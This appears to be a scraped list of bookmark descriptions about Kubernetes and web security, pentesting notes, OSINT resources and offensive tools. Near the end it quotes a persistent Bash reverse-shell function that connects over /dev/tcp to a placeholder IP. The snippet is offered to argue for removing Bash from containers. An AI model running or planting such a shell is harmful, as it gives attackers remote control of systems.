CLI tool for linting and testing Helm charts. Contribute to helm/chart-testing development by creating an account on GitHub.
Introduction to SELinux Security Enhanced Linux (SELinux) provides an additional layer of system security. SELinux fundamentally answers the question: May <subject> do <action> to <object>?, for example: May a web…
Kubernetes LAN Party - by Wiz
https://www.bettercap.org/installation/
Contribute to vulnersCom/trivy-plugin-vulners-db development by creating an account on GitHub.
This is a GitBook of mine whose purpose is keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online makes it most convenient to access. So, if you find it handy too, feel free to use it... responsibly, of course!
Never ever ever use pixelation as a redaction technique - GitHub - BishopFox/unredacter: Never ever ever use pixelation as a redaction technique
The open source tool analyzes Kubernetes YAML files and Helm charts to ensure they adhere to best practices, focusing on production readiness and security. Here's how to set it up and use it.
🔒 Consolidating and extending hosts files from several well-curated sources. Optionally pick extensions for porn, social media, and other categories. - GitHub - StevenBlack/hosts: 🔒 Consolidating and extending hosts files from several well-curated sources. Optionally pick extensions for porn, social media, and other categories.
Kubernetes exploitation tool. Contribute to Rolix44/Kubestroyer development by creating an account on GitHub.
I hacked into a @Bing CMS that allowed me to alter search results and take over millions of @Office365 accounts. How did I do it? Well, it all started with a simple click in @Azure… 👀 This is the story of #BingBang 🧵⬇️
OWASP has created the OWASP Kubernetes Top 10, which helps identify the most likely risks.
Quickly collect data from thousands of exposed Elasticsearch or Kibana instances and generate a report to be analysed. - GitHub - 9oelM/elasticpwn: Quickly collect data from thousands of exposed Elasticsearch or Kibana instances and generate a report to be analysed.
Vulnerable app with examples showing how to not use secrets - GitHub - OWASP/wrongsecrets: Vulnerable app with examples showing how to not use secrets
This repository brings together tool builders, bloggers, speakers, book authors, and other interesting Mastodon accounts - GitHub - cipher387/OSINT-and-Cybersecurity-accounts-in-Mastodon: This repository brings together tool builders, bloggers, speakers, book authors, and other interesting Mastodon accounts
Hello, we shall run the OWASP juice shop as a deployment, and expose it as a service in a local kubernetes cluster launched with kind. Hence, familiarity with kubernetes deployment and service is essential to follow along. You can try this with any cluster, though I am using a cluster that was launched with kind. For those not aware, kind is a tool that makes launching k8s clusters on your local machine easy.
Welcome to the page where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.
https://viperone.gitbook.io/pentest-everything/
Periodic cyber security newsletters that capture the latest news, summaries of conference talks, research, best practices, tools, events, vulnerabilities, and analysis of trending threats and attacks - GitHub - TalEliyahu/awesome-security-newsletters: Periodic cyber security newsletters that capture the latest news, summaries of conference talks, research, best practices, tools, events, vulnerabilities, and analysis of trending threats and attacks
Run Juice Shop on Kubernetes
Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening - GitHub - arkenfox/user.js: Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening
Die lange Liste der Hackerangriffe des Jahres in Deutschland.
It’s been a while since my last post on medium but I’m back, I want to tell you a short story about a private bug bounty program and why you can always check public Repos on GitHub, because you will…
A reference of the reporting settings administrators configure in kibana.yml.
A curated list of awesome GraphQL Security frameworks, libraries, software and resources - GitHub - Escape-Technologies/awesome-graphql-security: A curated list of awesome GraphQL Security frameworks, libraries, software and resources
Useful Google Dorks for WebSecurity and Bug Bounty - GitHub - Proviesec/google-dorks: Useful Google Dorks for WebSecurity and Bug Bounty
Trivy v0.29.0 release brings many updates, such as RBAC security and Helm chart scanning, custom extensions, a Trivy Operator Lens integration, and more
This is the first post in a series called ‘Smashing the Modern Web Tech Stack.’ Web Applications today are more complex than ever. I’m writing this series to organize and process some core ideas and…
https://madhuakula.com/kubernetes-goat/about.html
whatfiles is a Linux utility. It traces any new processes and threads that are created by the targeted process as well.
Fully open-source security audit for project dependencies based on known vulnerabilities and advisories. Supports both local repos and container images. Integrates with various CI environments such as Azure Pipelines, CircleCI, Google CloudBuild. No server required! - GitHub - AppThreat/dep-scan: Fully open-source security audit for project dependencies based on known vulnerabilities and advisories. Supports both local repos and container images. Integrates with various CI environments such as Azure Pipelines, CircleCI, Google CloudBuild. No server required!
Compilation of Resources from TCM's OSINT Course. Contribute to TCM-Course-Resources/Open-Source-Intellingence-Resources development by creating an account on GitHub.
A repo to automatically generates and keep updated a series of Docker images through GitHub Actions. - GitHub - cybersecsi/RAUDI: A repo to automatically generates and keep updated a series of Docker images through GitHub Actions.
Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth. - GitHub - sc0tfree/updog: Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.
Using SSH agent forwarding is dangerous. However, a dedicated agent can mitigate the risks.
Important for HCL Connections Automation! The global UseAgentForward needs more documentation and anrework to avoid.
NTLM relaying for Windows made easy. Contribute to CCob/lsarelayx development by creating an account on GitHub.
A simple Bash reverse shell like this one is a good reason to remove Bash from your containers. It uses Bash’s virtual /dev/tcp/ filesystem, and is not exploitable in sh, which doesn’t include this oft-abused feature:
revshell() {
local TARGET_IP="${1:-123.123.123.123}";
local TARGET_PORT="${2:-1234}";
while :; do
nohup bash -i &> \
/dev/tcp/${TARGET_IP}/${TARGET_PORT} 0>&1;
sleep 1;
done
}
While Kubernetes has many advantages, it also brings new security challenges.
Securing applications is not the easiest thing to do. An application has many components: server-side logic, client-side logic, data storage, data transportation, API, and more. With all these…
How to configure your browser to block web fonts to speed up your web browsing and protect your privacy.
Vulnerable by design
Container outbreaks and other security related things